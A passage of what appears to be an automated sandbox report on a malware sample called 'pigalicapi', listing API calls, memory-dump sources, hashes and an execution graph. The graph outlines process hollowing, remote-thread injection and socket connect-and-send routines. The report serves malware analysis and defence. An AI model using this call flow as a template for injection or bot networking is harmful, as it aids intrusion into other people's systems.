                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C314EB1E00209EFCF04DF94C995BEEB7B9FF58300F108159E515AB281E738AA85CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,0056178F,?,?,?,?,?,?,?,?,?,?,005A6E78), ref: 0057164A
                                                                                                                                                                                                                                                          • SetHandleInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2), ref: 00571667
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorHandleInformationLast
                                                                                                                                                                                                                                                          • String ID: xnZ
                                                                                                                                                                                                                                                          • API String ID: 1721798545-3580042809
                                                                                                                                                                                                                                                          • Opcode ID: 4bed2c2846fe098fcc7c27512bde9b38e5d90bd50b83a3aa5ffbcb266ead8535
                                                                                                                                                                                                                                                          • Instruction ID: 0e032c0e7ea09d1ba4c920ab90837ee36d71b8d90ce03a1f45157602831bdd70
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bed2c2846fe098fcc7c27512bde9b38e5d90bd50b83a3aa5ffbcb266ead8535
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331D231600606CFC308CF2CE9949A6B7F9FB95354F088669E0598B2A1D730ED89EF95
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00564E38,?,?,?,?,?,?,005A6E78,?,?,?,?,005A6E78), ref: 00570476
                                                                                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00570489
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$ProcessWalk
                                                                                                                                                                                                                                                          • String ID: xnZ
                                                                                                                                                                                                                                                          • API String ID: 3245327933-3580042809
                                                                                                                                                                                                                                                          • Opcode ID: 1ac7ddddd4bb8eb47453228cf5c23f3bb54afba5f97d0eb2d2fbf50d03af31ad
                                                                                                                                                                                                                                                          • Instruction ID: 5522110c27eaa8893718d0aeb5bcba924f88950fd0dcf7c1450c47ef09b018a5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ac7ddddd4bb8eb47453228cf5c23f3bb54afba5f97d0eb2d2fbf50d03af31ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121E432610211CFDB04CF28E98495AB7EBFB84314F19863AE509972D1D7B4EC49EB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0056A63F
                                                                                                                                                                                                                                                          • ___raise_securityfailure.LIBCMT ref: 0056A726
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                          • String ID: (zZ
                                                                                                                                                                                                                                                          • API String ID: 3761405300-2540824540
                                                                                                                                                                                                                                                          • Opcode ID: 926be67d156f15ddf1bc873eeeb45e19ff4d45e9d47777730121585b74bb8221
                                                                                                                                                                                                                                                          • Instruction ID: aa742f73cd80b92e25ec46c2daa2685a6f0627bc9192958fc3e8ec88b7fb9d1b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 926be67d156f15ddf1bc873eeeb45e19ff4d45e9d47777730121585b74bb8221
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 302128F961920C9AD300CF15EC956547BE4FB2E310F10546AE90587BA0E3B05A89EFA5
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                          • Opcode ID: 0cfef7bc6a600e2a2f7e8bcaa78dcf7b1996baf8e2005a7d04155a5763a9e772
                                                                                                                                                                                                                                                          • Instruction ID: eaf0357e5dda4fac2919e89507224762c78a0268581db45bcba6c81111180687
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cfef7bc6a600e2a2f7e8bcaa78dcf7b1996baf8e2005a7d04155a5763a9e772
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79118B75908208BBCB04CF94C995BEDBBB8EB10304F00D28DF925AA281D335E689CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A11EB4
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A11EC2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                          • Opcode ID: 68c8acb72b07cbdc600400ff7a561a71c1d6b601f669f96ecdd3d8c47e4a1bb7
                                                                                                                                                                                                                                                          • Instruction ID: 8716ec0c322244b142b4fe18af979133cddafc870a17cec475fabe51412a6050
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68c8acb72b07cbdc600400ff7a561a71c1d6b601f669f96ecdd3d8c47e4a1bb7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD011DB5A4420CABDB10DBD0DD4AFFE77B9AB04704F144118FA08AB2C0E7749E45CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:2.1%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:98.6%
                                                                                                                                                                                                                                                          Signature Coverage:0.7%
                                                                                                                                                                                                                                                          Total number of Nodes:1085
                                                                                                                                                                                                                                                          Total number of Limit Nodes:15
                                                                                                                                                                                                                                                          execution_graph 17233 401000 17235 401005 17233->17235 17236 401014 LoadLibraryExA 17235->17236 17238 401056 GetProcAddress 17236->17238 17241 401126 VirtualAlloc 17238->17241 17242 40114e 17241->17242 17243 401083 GetPEB 17242->17243 17248 4011cd 17242->17248 17245 4011b4 17252 4001989 17245->17252 17271 4001780 WSAStartup 17245->17271 17249 40124a 17248->17249 17251 4011e6 17248->17251 17249->17245 17250 4011f1 LoadLibraryExA 17250->17249 17250->17251 17251->17249 17251->17250 17253 40017b6 17252->17253 17255 400198b Sleep 17253->17255 17256 40017de CreateEventA 17253->17256 17291 4001490 17253->17291 17255->17253 17308 40023e0 17256->17308 17259 4001891 17261 400196e WaitForSingleObject Sleep 17259->17261 17264 40023e0 32 API calls 17259->17264 17268 4001dc0 8 API calls 17259->17268 17323 4001470 GetProcessHeap RtlAllocateHeap 17259->17323 17265 400199b WSACleanup 17261->17265 17264->17259 17267 40019a0 ExitProcess 17265->17267 17266 4001831 CreateThread 17266->17259 17385 4001630 48 API calls 17266->17385 17268->17259 17270 4001903 CreateThread 17270->17259 17371 4001630 17270->17371 17272 40019a0 ExitProcess 17271->17272 17274 40017a2 17271->17274 17273 4001490 18 API calls 17273->17274 17274->17273 17275 400198b Sleep 17274->17275 17277 40017de CreateEventA 17274->17277 17276 4001996 17275->17276 17276->17274 17278 40023e0 32 API calls 17277->17278 17279 4001804 17278->17279 17280 4001dc0 8 API calls 17279->17280 17288 4001891 17279->17288 17282 4001827 17280->17282 17281 400196e WaitForSingleObject Sleep 17285 400199b WSACleanup 17281->17285 17386 4001470 GetProcessHeap RtlAllocateHeap 17282->17386 17284 40023e0 32 API calls 17284->17288 17285->17272 17286 4001831 CreateThread 17286->17288 17389 4001630 48 API calls 17286->17389 17287 4001dc0 8 API calls 17287->17288 17288->17281 17288->17284 17288->17287 17387 4001470 GetProcessHeap RtlAllocateHeap 17288->17387 17290 4001903 CreateThread 17290->17288 17388 4001630 48 API calls 17290->17388 17293 40014c2 17291->17293 17292 400161a 17292->17253 17293->17292 17324 4001430 17293->17324 17296 4001430 QueryPerformanceCounter 17297 4001524 17296->17297 17327 4001160 socket 17297->17327 17300 400160d Sleep 17300->17292 17301 400155f 17336 40013b0 17301->17336 17350 4001f80 17308->17350 17311 4001dc0 17312 4001827 17311->17312 17313 4001dd7 17311->17313 17322 4001470 GetProcessHeap RtlAllocateHeap 17312->17322 17313->17312 17314 4001de1 VirtualAlloc 17313->17314 17314->17312 17315 4001e2a VirtualAllocEx 17314->17315 17316 4001e4f VirtualAllocEx 17315->17316 17318 4001e87 17315->17318 17317 4001e6f VirtualFree 17316->17317 17316->17318 17317->17312 17319 4001f03 WriteProcessMemory 17318->17319 17320 4001f22 VirtualFree 17319->17320 17321 4001f37 VirtualFree CreateRemoteThread 17319->17321 17320->17312 17321->17312 17322->17266 17323->17270 17325 4001440 QueryPerformanceCounter 17324->17325 17326 400143c 17324->17326 17325->17326 17326->17296 17328 4001182 htons gethostbyname 17327->17328 17329 400117a 17327->17329 17328->17329 17332 40011ab 17328->17332 17329->17300 17329->17301 17330 40011fa 17333 4001218 17330->17333 17334 400120a closesocket 17330->17334 17331 40011e7 connect 17331->17330 17331->17332 17332->17330 17332->17331 17333->17329 17335 400121e setsockopt setsockopt 17333->17335 17334->17329 17335->17329 17337 4001411 lstrcat GetTickCount 17336->17337 17338 40013c3 17336->17338 17340 40010e0 17337->17340 17338->17337 17339 40013e3 QueryPerformanceCounter Sleep 17338->17339 17339->17338 17341 40010ec 17340->17341 17344 40010f2 17340->17344 17342 4001103 send 17341->17342 17343 400113a send 17341->17343 17341->17344 17342->17341 17342->17344 17343->17344 17345 4001040 17344->17345 17346 4001052 closesocket 17345->17346 17347 400104c 17345->17347 17346->17292 17347->17346 17348 4001067 recv 17347->17348 17349 4001094 GetTickCount 17347->17349 17348->17347 17349->17347 17351 4001804 17350->17351 17352 4001f93 GetEnvironmentVariableA lstrcat 17350->17352 17351->17259 17351->17311 17353 4001fc2 lstrcat lstrcat 17352->17353 17354 4001fe5 17352->17354 17353->17354 17355 4002008 VirtualAlloc 17354->17355 17355->17351 17356 400206d CreateProcessA 17355->17356 17357 40020b2 VirtualAllocEx 17356->17357 17358 400209a VirtualFree 17356->17358 17359 40020e3 VirtualAllocEx 17357->17359 17361 400214d 17357->17361 17358->17351 17360 400210c TerminateProcess CloseHandle CloseHandle VirtualFree 17359->17360 17359->17361 17360->17351 17362 400224b WriteProcessMemory 17361->17362 17363 4002270 TerminateProcess CloseHandle CloseHandle VirtualFree 17362->17363 17364 40022b1 VirtualFree Wow64GetThreadContext 17362->17364 17363->17351 17365 4002314 WriteProcessMemory 17364->17365 17366 40022e4 TerminateProcess CloseHandle CloseHandle 17364->17366 17367 4002367 Wow64SetThreadContext 17365->17367 17368 400233a TerminateProcess CloseHandle CloseHandle 17365->17368 17366->17351 17369 4002394 ResumeThread 17367->17369 17370 40023a9 TerminateProcess CloseHandle CloseHandle 17367->17370 17368->17351 17369->17351 17370->17351 17372 4001640 CoInitialize 17371->17372 17373 4001766 17371->17373 17372->17373 17377 4001668 17372->17377 17374 400167c WaitForSingleObject 17375 40016a3 GetExitCodeProcess 17374->17375 17376 400168f TerminateProcess 17374->17376 17375->17377 17376->17373 17377->17373 17377->17374 17378 40016cc Sleep 17377->17378 17379 40016e5 SetEvent 17377->17379 17380 40016f6 CloseHandle Sleep 17377->17380 17378->17377 17379->17373 17381 40023e0 32 API calls 17380->17381 17384 4001723 17381->17384 17382 4001735 17382->17373 17383 4001dc0 8 API calls 17383->17384 17384->17377 17384->17382 17384->17383 17386->17286 17387->17290 17399 4002400 17400 4002420 VirtualAlloc 17399->17400 17401 400250f 17399->17401 17402 4002467 VirtualAlloc 17400->17402 17403 400247d 17400->17403 17402->17403 17403->17401 17405 4001a50 17403->17405 17408 4001a30 GetPEB 17405->17408 17407 4001a88 17407->17401 17408->17407 18004 40264c3 18022 40263dd _Smanip codecvt 18004->18022 18005 40264d8 18023 4025580 18005->18023 18010 40255a0 __VEC_memcpy 18011 4026555 18010->18011 18012 40255a0 __VEC_memcpy 18011->18012 18019 402657a 18012->18019 18013 4024ae0 __VEC_memcpy 18013->18022 18015 4026403 18016 4026697 18017 4024ae0 __VEC_memcpy 18016->18017 18018 40266b1 codecvt 18017->18018 18019->18016 18029 4024ae0 18019->18029 18021 40255a0 __VEC_memcpy 18021->18022 18022->18005 18022->18013 18022->18015 18022->18021 18033 40255c0 18022->18033 18024 4024ae0 __VEC_memcpy 18023->18024 18025 402559b 18024->18025 18026 40255a0 18025->18026 18027 4024ae0 __VEC_memcpy 18026->18027 18028 40255bb 18027->18028 18028->18010 18032 4024aea _memset codecvt 18029->18032 18030 4024af6 18030->18016 18031 4006ca0 __VEC_memcpy _realloc 18031->18032 18032->18030 18032->18031 18034 40257f0 codecvt __crtLCMapStringA_stat 18033->18034 18035 40255e4 18033->18035 18034->18022 18049 4022540 18035->18049 18037 402563f 18037->18034 18038 4006ca0 _realloc __VEC_memcpy 18037->18038 18039 40256e8 18038->18039 18040 4006ca0 _realloc __VEC_memcpy 18039->18040 18041 402570f 18040->18041 18042 4006ca0 _realloc __VEC_memcpy 18041->18042 18043 4025757 18042->18043 18044 4006ca0 _realloc __VEC_memcpy 18043->18044 18045 402579d 18044->18045 18046 4006ca0 _realloc __VEC_memcpy 18045->18046 18047 40257c4 18046->18047 18048 4006ca0 _realloc __VEC_memcpy 18047->18048 18048->18034 18050 4022565 18049->18050 18052 4022647 codecvt 18049->18052 18051 4006ca0 _realloc __VEC_memcpy 18050->18051 18050->18052 18051->18052 18052->18037 18053 4018ec0 18055 4018ec3 18053->18055 18054 4018ed6 18055->18054 18057 40196c0 18055->18057 18060 40196d0 codecvt 18057->18060 18058 4019847 18058->18055 18060->18058 18061 401b730 18060->18061 18075 401b747 18061->18075 18062 401b7ba 18079 401b650 18062->18079 18064 401b7d7 18065 401b650 __VEC_memcpy 18064->18065 18068 401b755 18065->18068 18066 401b890 18067 401b8b9 18066->18067 18091 401b430 18066->18091 18067->18068 18072 401b650 __VEC_memcpy 18067->18072 18068->18060 18069 401b80d 18069->18068 18073 401b650 __VEC_memcpy 18069->18073 18070 401b901 18074 401b650 __VEC_memcpy 18070->18074 18072->18068 18073->18068 18074->18068 18075->18062 18075->18064 18075->18066 18075->18068 18075->18069 18075->18070 18097 401acb0 18075->18097 18103 401afe0 18075->18103 18109 401b240 18075->18109 18080 401b681 18079->18080 18081 401b669 18079->18081 18083 401b6a2 18080->18083 18084 401b68a 18080->18084 18082 401acb0 __VEC_memcpy 18081->18082 18090 401b67f 18082->18090 18086 401b6c3 18083->18086 18087 401b6ab 18083->18087 18085 401afe0 __VEC_memcpy 18084->18085 18085->18090 18089 401b430 __VEC_memcpy 18086->18089 18086->18090 18088 401b240 __VEC_memcpy 18087->18088 18088->18090 18089->18090 18090->18068 18092 401b440 18091->18092 18093 401b4ce 18092->18093 18094 401a890 __VEC_memcpy 18092->18094 18096 401b45a 18092->18096 18095 401cd80 __VEC_memcpy 18093->18095 18094->18092 18095->18096 18096->18067 18102 401acce 18097->18102 18098 401ad5a 18099 401cd80 __VEC_memcpy 18098->18099 18100 401ace5 codecvt 18099->18100 18100->18075 18101 401a890 __VEC_memcpy 18101->18102 18102->18098 18102->18100 18102->18101 18107 401affe 18103->18107 18104 401b083 18105 401cd80 __VEC_memcpy 18104->18105 18106 401b015 codecvt 18105->18106 18106->18075 18107->18104 18107->18106 18108 401a890 __VEC_memcpy 18107->18108 18108->18107 18114 401b250 18109->18114 18110 401b2d5 18112 401cd80 __VEC_memcpy 18110->18112 18111 401a890 __VEC_memcpy 18111->18114 18113 401b267 18112->18113 18113->18075 18114->18110 18114->18111 18114->18113 18225 4018f00 18228 4018f06 codecvt 18225->18228 18226 4018f0c 18228->18226 18229 401c850 18228->18229 18232 401c860 codecvt 18229->18232 18230 401c866 18230->18228 18232->18230 18234 4023590 18232->18234 18240 4028060 18232->18240 18239 40235aa _memset codecvt 18234->18239 18235 40235b6 __crtLCMapStringA_stat 18235->18232 18236 4006ca0 _realloc __VEC_memcpy 18236->18239 18237 40228b0 __VEC_memcpy 18237->18239 18239->18235 18239->18236 18239->18237 18244 4005330 18239->18244 18242 402806d 18240->18242 18241 402808b 18241->18232 18242->18241 18250 4027050 18242->18250 18245 4005346 _memset 18244->18245 18246 401efb0 __VEC_memcpy 18245->18246 18247 4005352 18246->18247 18248 4006ca0 _realloc __VEC_memcpy 18247->18248 18249 4005386 18248->18249 18249->18239 18253 4027060 _memset 18250->18253 18251 40048c0 __VEC_memcpy 18251->18253 18252 4027078 codecvt 18252->18242 18253->18251 18253->18252 18254 40044b0 __VEC_memcpy 18253->18254 18255 4004600 __VEC_memcpy 18253->18255 18256 4004b60 __VEC_memcpy 18253->18256 18257 4004d10 __VEC_memcpy 18253->18257 18258 4006ca0 __VEC_memcpy _realloc 18253->18258 18264 4026a70 18253->18264 18268 4026200 18253->18268 18272 4025ba0 18253->18272 18276 40259d0 18253->18276 18280 4025d70 18253->18280 18254->18253 18255->18253 18256->18253 18257->18253 18258->18253 18266 4026a7d _memset 18264->18266 18265 4026a8f 18265->18253 18266->18265 18284 4025f40 18266->18284 18270 402620d _memset 18268->18270 18269 402621f 18269->18253 18270->18269 18288 4025290 18270->18288 18274 4025bad _memset 18272->18274 18273 4025bbf 18273->18253 18274->18273 18292 4024e20 18274->18292 18278 40259dd _memset 18276->18278 18277 40259ef 18277->18253 18278->18277 18296 4024c40 18278->18296 18282 4025d7d _memset 18280->18282 18281 4025d8f 18281->18253 18282->18281 18300 4025020 18282->18300 18286 4025f4a _memset codecvt 18284->18286 18285 4025f5c 18285->18266 18286->18285 18287 4006ca0 __VEC_memcpy _realloc 18286->18287 18287->18286 18289 402529a _memset 18288->18289 18290 40252ac 18289->18290 18291 4006ca0 __VEC_memcpy _realloc 18289->18291 18290->18270 18291->18289 18294 4024e2a _memset 18292->18294 18293 4024e3c 18293->18274 18294->18293 18295 4006ca0 __VEC_memcpy _realloc 18294->18295 18295->18294 18298 4024c4a _memset 18296->18298 18297 4024c5c 18297->18278 18298->18297 18299 4006ca0 _realloc __VEC_memcpy 18298->18299 18299->18298 18302 402502a _memset 18300->18302 18301 402503c 18301->18282 18302->18301 18303 4006ca0 __VEC_memcpy _realloc 18302->18303 18303->18302 18376 4019340 18380 4019354 codecvt 18376->18380 18377 401941f 18380->18377 18381 4018bd0 18380->18381 18385 4019240 18380->18385 18384 4018be0 18381->18384 18382 4018beb 18382->18380 18384->18382 18389 4016b00 18384->18389 18387 4019250 18385->18387 18388 401932b 18387->18388 18429 401c800 18387->18429 18388->18380 18390 4016b16 codecvt 18389->18390 18391 4016c96 18390->18391 18393 4017d10 18390->18393 18391->18384 18417 4017d27 std::_Iterator_base::_Iterator_base _strlen 18393->18417 18394 40186c9 18394->18390 18395 401ee80 __VEC_memcpy 18395->18417 18396 4017df5 18398 4017e18 18396->18398 18399 4017f4c 18396->18399 18419 4017d5a 18396->18419 18397 40060a0 __VEC_memcpy 18397->18417 18402 4017e37 18398->18402 18403 4017e96 18398->18403 18398->18419 18400 4017fd3 18399->18400 18401 4017f58 18399->18401 18404 40194d0 __VEC_memcpy 18400->18404 18410 4017f93 18401->18410 18416 401fea0 __VEC_memcpy 18401->18416 18401->18419 18406 4017e5e 18402->18406 18412 401fea0 __VEC_memcpy 18402->18412 18409 40194d0 __VEC_memcpy 18403->18409 18408 4017ffb 18404->18408 18405 4024600 __VEC_memcpy 18405->18417 18413 40195c0 __VEC_memcpy 18406->18413 18407 4017740 __VEC_memcpy 18407->18417 18418 401fea0 __VEC_memcpy 18408->18418 18408->18419 18414 4017ebf 18409->18414 18411 40195c0 __VEC_memcpy 18410->18411 18411->18419 18412->18406 18413->18419 18414->18419 18420 401fea0 __VEC_memcpy 18414->18420 18415 401fea0 __VEC_memcpy 18422 40185bd codecvt 18415->18422 18416->18410 18417->18395 18417->18396 18417->18397 18417->18405 18417->18407 18417->18419 18421 4017350 __VEC_memcpy 18417->18421 18423 401844f 18417->18423 18426 4017b40 __VEC_memcpy 18417->18426 18418->18419 18419->18394 18419->18415 18419->18422 18420->18419 18421->18417 18422->18394 18428 4006410 __VEC_memcpy 18422->18428 18424 4017350 __VEC_memcpy 18423->18424 18425 4018473 18424->18425 18425->18419 18427 4017b40 __VEC_memcpy 18425->18427 18426->18417 18427->18419 18428->18394 18430 401c810 18429->18430 18431 401c816 18430->18431 18433 40263d0 18430->18433 18431->18387 18436 40263dd _Smanip codecvt 18433->18436 18434 4024ae0 __VEC_memcpy 18434->18436 18435 40255a0 __VEC_memcpy 18435->18436 18436->18434 18436->18435 18437 40264d8 18436->18437 18445 40255c0 __VEC_memcpy 18436->18445 18446 4026403 18436->18446 18438 4025580 __VEC_memcpy 18437->18438 18439 402650b 18438->18439 18440 40255a0 __VEC_memcpy 18439->18440 18441 4026530 18440->18441 18442 40255a0 __VEC_memcpy 18441->18442 18443 4026555 18442->18443 18444 40255a0 __VEC_memcpy 18443->18444 18450 402657a 18444->18450 18445->18436 18446->18430 18447 4026697 18448 4024ae0 __VEC_memcpy 18447->18448 18449 40266b1 codecvt 18448->18449 18449->18430 18450->18447 18451 4024ae0 __VEC_memcpy 18450->18451 18451->18447 17409 4014c03 17413 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 17409->17413 17414 4014ea7 __crtLCMapStringA_stat 17413->17414 17417 401e730 17413->17417 17421 401ebc0 17413->17421 17425 4020050 17413->17425 17429 401f9f0 17413->17429 17433 401efb0 17413->17433 17419 401e73d _strlen 17417->17419 17418 401e749 17418->17413 17419->17418 17437 4006ca0 17419->17437 17424 401ebcd _memset codecvt _strlen 17421->17424 17422 401ebe5 17422->17413 17423 4006ca0 __VEC_memcpy _realloc 17423->17424 17424->17422 17424->17423 17426 4020069 _vwprintf 17425->17426 17427 401f9f0 __VEC_memcpy 17426->17427 17428 40200c1 codecvt 17427->17428 17428->17413 17431 401fa0f _memset codecvt _strlen 17429->17431 17430 401fa1b __crtLCMapStringA_stat 17430->17413 17431->17430 17432 4006ca0 __VEC_memcpy _realloc 17431->17432 17432->17431 17435 401efbd _strlen 17433->17435 17434 401efc3 17434->17413 17435->17434 17436 4006ca0 _realloc __VEC_memcpy 17435->17436 17436->17435 17438 4006cb8 17437->17438 17439 4006ce7 17438->17439 17440 4006cdf __VEC_memcpy 17438->17440 17440->17439 18452 401ad47 18453 401acce 18452->18453 18454 401ad5a 18453->18454 18455 401a890 __VEC_memcpy 18453->18455 18457 401ace5 codecvt 18453->18457 18456 401cd80 __VEC_memcpy 18454->18456 18455->18453 18456->18457 18560 4013fcb 18565 4013f63 codecvt _memcmp _strlen 18560->18565 18561 4013f75 18562 40111a0 __VEC_memcpy 18562->18565 18563 4006ca0 __VEC_memcpy _realloc 18563->18565 18564 4013f50 __VEC_memcpy 18564->18565 18565->18561 18565->18562 18565->18563 18565->18564 18566 4010d70 __VEC_memcpy 18565->18566 18566->18565 18567 40193cb 18570 4019354 codecvt 18567->18570 18568 401941f 18569 4018bd0 __VEC_memcpy 18569->18570 18570->18568 18570->18569 18571 4019240 __VEC_memcpy 18570->18571 18571->18570 18538 4014b94 18544 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 18538->18544 18539 4014ea7 __crtLCMapStringA_stat 18540 401e730 __VEC_memcpy 18540->18544 18541 401f9f0 __VEC_memcpy 18541->18544 18542 401efb0 __VEC_memcpy 18542->18544 18543 401ebc0 __VEC_memcpy 18543->18544 18544->18539 18544->18540 18544->18541 18544->18542 18544->18543 18545 4020050 __VEC_memcpy 18544->18545 18545->18544 18572 401cddc 18575 401cd90 codecvt 18572->18575 18573 401cda8 18574 4006ca0 _realloc __VEC_memcpy 18574->18575 18575->18573 18575->18574 18576 40145df 18584 4014500 codecvt std::_Iterator_base::_Iterator_base _strlen 18576->18584 18577 40145f4 18578 401e8c0 __VEC_memcpy 18577->18578 18580 4014616 _memset 18578->18580 18579 401fc90 __VEC_memcpy 18579->18584 18581 401467b 18580->18581 18585 4006ca0 _realloc __VEC_memcpy 18580->18585 18586 4014692 codecvt 18580->18586 18583 4006ca0 _realloc __VEC_memcpy 18581->18583 18582 401450c 18583->18586 18584->18577 18584->18579 18584->18582 18585->18581 18318 401b91e 18320 401b747 18318->18320 18319 401b240 __VEC_memcpy 18319->18320 18320->18319 18321 401b7ba 18320->18321 18323 401b7d7 18320->18323 18325 401b890 18320->18325 18326 401b80d 18320->18326 18327 401b901 18320->18327 18333 401b755 18320->18333 18334 401acb0 __VEC_memcpy 18320->18334 18335 401afe0 __VEC_memcpy 18320->18335 18322 401b650 __VEC_memcpy 18321->18322 18322->18333 18324 401b650 __VEC_memcpy 18323->18324 18324->18333 18328 401b430 __VEC_memcpy 18325->18328 18332 401b8b9 18325->18332 18330 401b650 __VEC_memcpy 18326->18330 18326->18333 18331 401b650 __VEC_memcpy 18327->18331 18328->18332 18329 401b650 __VEC_memcpy 18329->18333 18330->18333 18331->18333 18332->18329 18332->18333 18334->18320 18335->18320 